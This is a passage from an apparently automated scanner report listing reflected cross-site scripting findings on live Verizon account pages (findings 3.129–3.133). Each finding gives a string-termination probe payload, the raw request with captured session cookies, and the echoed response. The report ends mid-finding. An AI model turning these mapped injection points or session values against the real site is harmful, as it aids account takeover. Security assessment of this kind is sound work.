ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSQCTQBBS=AFAADPNBHJKOMNEGALNHDACA; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 128949

<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
ie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/billview/PfbPage.aspx?d9f30";3e7ac830269=1';
<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->
...[SNIP]...

3.129. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/myaccount/Main/MyAccount.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbeb"%3b928f0315c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dbeb";928f0315c8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/myaccount/Main/MyAccount.aspx?1dbeb"%3b928f0315c8d=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128975

<!-- Vignette V6 Fri Nov 19 18:49:44 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
Com=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx?1dbeb";928f0315c8d=1';
<!-- Vignette V6 Fri Nov 19 18:49:44 2010 -->
...[SNIP]...

3.130. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The value of the Target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a525"%3b6c5402aa620 was submitted in the Target parameter. This input was echoed as 6a525";6c5402aa620 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?Target=6a525"%3b6c5402aa620 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:43:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=DGDMJDFBHBIOMKNLOAIKOOMO; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128927

<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?Target=6a525";6c5402aa620';
<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->
...[SNIP]...

3.131. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcc6f"%3b98476cbd401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcc6f";98476cbd401 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?fcc6f"%3b98476cbd401=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:41:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=KKCMJDFBHONCKMJLKPLHPKFD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128993

<!-- Vignette V6 Fri Nov 19 18:41:52 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
mopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?fcc6f";98476cbd401=1';
<!-- Vignette V6 Fri Nov 19 18:41:52 2010 -->
...[SNIP]...

3.132. https://www22.verizon.com/myverizon/ [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5019"%3b15d2ffcfe11 was submitted in the goto parameter. This input was echoed as c5019";15d2ffcfe11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myverizon/?session=n&goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019"%3b15d2ffcfe11 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; lob=webmail; amlbcookie=03

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:44 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=PJJGEODCPLFPKBGNAFICECAB; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:44 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129009

<!-- Vignette V6 Fri Nov 19 18:15:43 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspxc5019";15d2ffcfe11';
<!-- Vignette V6 Fri Nov 19 18:15:44 2010 -->
...[SNIP]...

3.133. https://www22.verizon.com/myverizon/ [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /myverizon/

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383dc"%3bf834175335c was submitted in the goto parameter. This input was echoed as 383dc";f834175335c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

